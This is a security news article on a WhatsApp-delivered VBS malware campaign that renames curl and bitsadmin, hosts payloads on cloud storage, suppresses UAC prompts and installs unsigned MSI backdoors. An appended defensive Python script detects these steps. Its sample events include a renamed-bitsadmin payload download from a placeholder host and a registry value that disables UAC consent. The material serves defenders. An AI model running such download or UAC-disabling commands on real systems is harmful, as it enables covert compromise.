
WhatsApp Attack Chain Distributes VBS, Cloud Payloads, and MSI Backdoor


Rising Threat of Malware Campaigns Utilizing WhatsApp for VBS Distribution

A recently identified malware campaign is drawing attention in the cybersecurity community for its approach of using WhatsApp messages to deliver malicious Visual Basic Script (VBS) files. The campaign targets Windows users and establishes persistent remote access by deploying unsigned MSI installers.

The campaign begins with WhatsApp messages carrying seemingly innocuous VBS file attachments. When opened on a Windows machine, these files execute scripts that set up the rest of the chain. The script first creates hidden folders in the C:\ProgramData directory. It then copies legitimate Windows utilities, such as curl.exe and bitsadmin.exe, into these newly created locations, renaming them to misleading file names like netapi.dll and sc.exe.

Despite the renaming, the binaries retain their original Portable Executable (PE) metadata, including the OriginalFileName field, which still identifies them as curl.exe and bitsadmin.exe. This discrepancy between the on-disk filename and the embedded metadata offers a detection opportunity for security products that inspect PE headers.

According to Microsoft Defender researchers, this campaign reportedly began in late February 2026. The attackers aim to establish a foothold on the victim's system, escalate privileges, and ultimately install malicious MSI packages that allow for deeper infiltration.

In environments lacking comprehensive inspection capabilities, defenders must monitor command-line arguments and network telemetry related to these utilities to detect potential abuse. The manipulation of trusted cloud infrastructure, such as AWS S3, Tencent Cloud, and Backblaze B2, is a notable tactic used by the attackers to facilitate their activities. By routing malicious downloads through these reputable platforms, the operators effectively camouflage their traffic as routine enterprise operations, complicating efforts to block the malicious activity based solely on domain or IP reputation.

This strategy reflects an unsettling trend in which cybercriminals weaponize legitimate cloud services to host dropper files and command-and-control resources, banking on the notion that businesses are hesitant to aggressively filter traffic from essential platforms. Because the chain relies on "living-off-the-land binaries" (LOLBins), its behavioral footprint remains notably small, especially in environments whose detection focuses primarily on unknown binaries or well-known malware families.

Once the attackers establish a foothold on the victim's system, they deploy secondary VBS payloads, such as auxs.vbs, 2009.vbs, and WinUpdate_KB5034231.vbs. These payloads tamper with critical Windows settings, including User Account Control (UAC) and various registry values, to obtain elevated privileges and improve the attackers' chances of maintaining access.

Through repeated attempts to launch cmd.exe with administrative rights, the attackers modify registry keys located under HKLM\Software\Microsoft\Win. By altering entries such as ConsentPromptBehaviorAdmin, they suppress UAC prompts, which, in turn, enables silent elevation of privileges. The combination of these registry manipulations with sophisticated UAC bypass techniques keeps the attackers firmly entrenched, allowing them to resist conventional cleanup efforts even after system reboots.

The final phase of this malware campaign sees the deployment of unsigned MSI installers that mimic common enterprise software such as Setup.msi, WinRAR.msi, LinkPoint.msi, and AnyDesk.msi. The lack of trusted publisher signatures on these installers is a strong indicator of malicious intent, given that legitimate software usually carries these signatures. Once these backdoors are installed, they provide attackers with persistent, interactive control over compromised hosts.

The widespread use of MSI-based deployment in managed environments allows these backdoors to easily blend into standard software rollout activities, especially if vigilant code-signing and reputation checks are not enforced.

In response to this surge in attacks, Microsoft has recommended various strategies for organizations to fortify their defenses. These recommendations include restricting or blocking script hosts such as wscript, cscript, and mshta in untrusted locations, as well as monitoring for renamed or concealed Windows utilities executed with atypical parameters.

Moreover, enabling cloud-delivered protection, implementing Endpoint Detection and Response (EDR) in block mode, and applying attack surface reduction rules for obfuscated or script-launched executables are essential measures that organizations can take to mitigate the risks posed by similar living-off-the-land campaigns.

Finally, organizations are strongly encouraged to enhance their inspection of traffic to cloud services like Tencent Cloud and Backblaze B2, focusing on identifying suspicious download patterns rather than relying solely on the reputation of destinations. To further combat these threats, it is vital for defenders to track registry changes under HKLM\Software\Microsoft\Win and be vigilant for signs of frequent UAC tampering, which can serve as potential indicators of compromise.
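As an added illustration (not from the article or from Microsoft's guidance), the Python below turns the detection points above into rules run over constructed Sysmon-style process-creation and registry events: a PE whose OriginalFileName disagrees with its on-disk name, a download utility or script host running from outside the Windows directory, a script host executing a .vbs dropped under ProgramData, and a value-set that zeroes ConsentPromptBehaviorAdmin. The field names, the hidden folder name `.cache`, the example host and all sample values are assumptions made for this example.

```python
"""Detection rules for the WhatsApp-delivered VBS / renamed-LOLBin / UAC-tamper chain.

All events below are constructed for this example and use Sysmon-style field names
(EventID 1: Image, OriginalFileName, CommandLine; EventID 13: TargetObject, Details).
"""
import ntpath
import re

LOLBINS = {"curl.exe", "bitsadmin.exe"}              # utilities the campaign copied and renamed
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
SYSTEM_DIR = "c:\\windows\\"                         # where these utilities legitimately live
UNTRUSTED_SCRIPT = re.compile(r"\\programdata\\[^\s\"]*\.vbs", re.I)
UAC_VALUE = "consentpromptbehavioradmin"             # 0 = elevate without prompting


def check_process(ev):
    """Return the rule names one process-creation event triggers (may be several)."""
    hits = []
    image = ev["Image"].lower()
    original = ev.get("OriginalFileName", "").lower()
    cmdline = ev.get("CommandLine", "")
    if original and original != ntpath.basename(image):   # e.g. bitsadmin.exe saved as sc.exe
        hits.append("renamed-binary")
    if original in LOLBINS | SCRIPT_HOSTS and not image.startswith(SYSTEM_DIR):
        hits.append("relocated-utility")                   # concealed copy outside C:\Windows
    if original in SCRIPT_HOSTS and UNTRUSTED_SCRIPT.search(cmdline):
        hits.append("vbs-from-programdata")
    return hits


def check_registry(ev):
    """Flag a registry value-set event that disables the admin UAC consent prompt."""
    if ev["TargetObject"].lower().endswith(UAC_VALUE) and ev.get("Details", "").endswith("0x00000000)"):
        return ["uac-tamper"]
    return []


def triage(events):
    """Dispatch each event to its rule set; returns (rule, image-or-key) pairs in event order."""
    findings = []
    for ev in events:
        if ev["EventID"] == 1:
            findings += [(r, ev["Image"]) for r in check_process(ev)]
        elif ev["EventID"] == 13:
            findings += [(r, ev["TargetObject"]) for r in check_registry(ev)]
    return findings


SAMPLE_EVENTS = [  # constructed sample telemetry, not data from the real campaign
    {"EventID": 1, "Image": r"C:\Windows\System32\curl.exe", "OriginalFileName": "curl.exe",
     "CommandLine": "curl.exe https://example.com/feed.json -o feed.json"},       # benign
    {"EventID": 1, "Image": r"C:\ProgramData\.cache\sc.exe", "OriginalFileName": "bitsadmin.exe",
     "CommandLine": r"sc.exe /transfer j https://bucket.example/p C:\ProgramData\.cache\p"},
    {"EventID": 1, "Image": r"C:\Windows\System32\wscript.exe", "OriginalFileName": "wscript.exe",
     "CommandLine": r'wscript.exe "C:\ProgramData\.cache\WinUpdate_KB5034231.vbs"'},
    {"EventID": 13, "Image": r"C:\Windows\System32\reg.exe", "Details": "DWORD (0x00000000)",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin"},
]

if __name__ == "__main__":
    for rule, where in triage(SAMPLE_EVENTS):
        print(f"{rule:22} {where}")
```

The benign curl.exe invocation produces no finding because its on-disk name, OriginalFileName and location all agree; only the relocated copy, the ProgramData script and the UAC value change are reported.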

As malware tactics continue to evolve and become increasingly sophisticated, the collective response of organizations, security professionals, and software providers will be crucial in safeguarding against such threats.
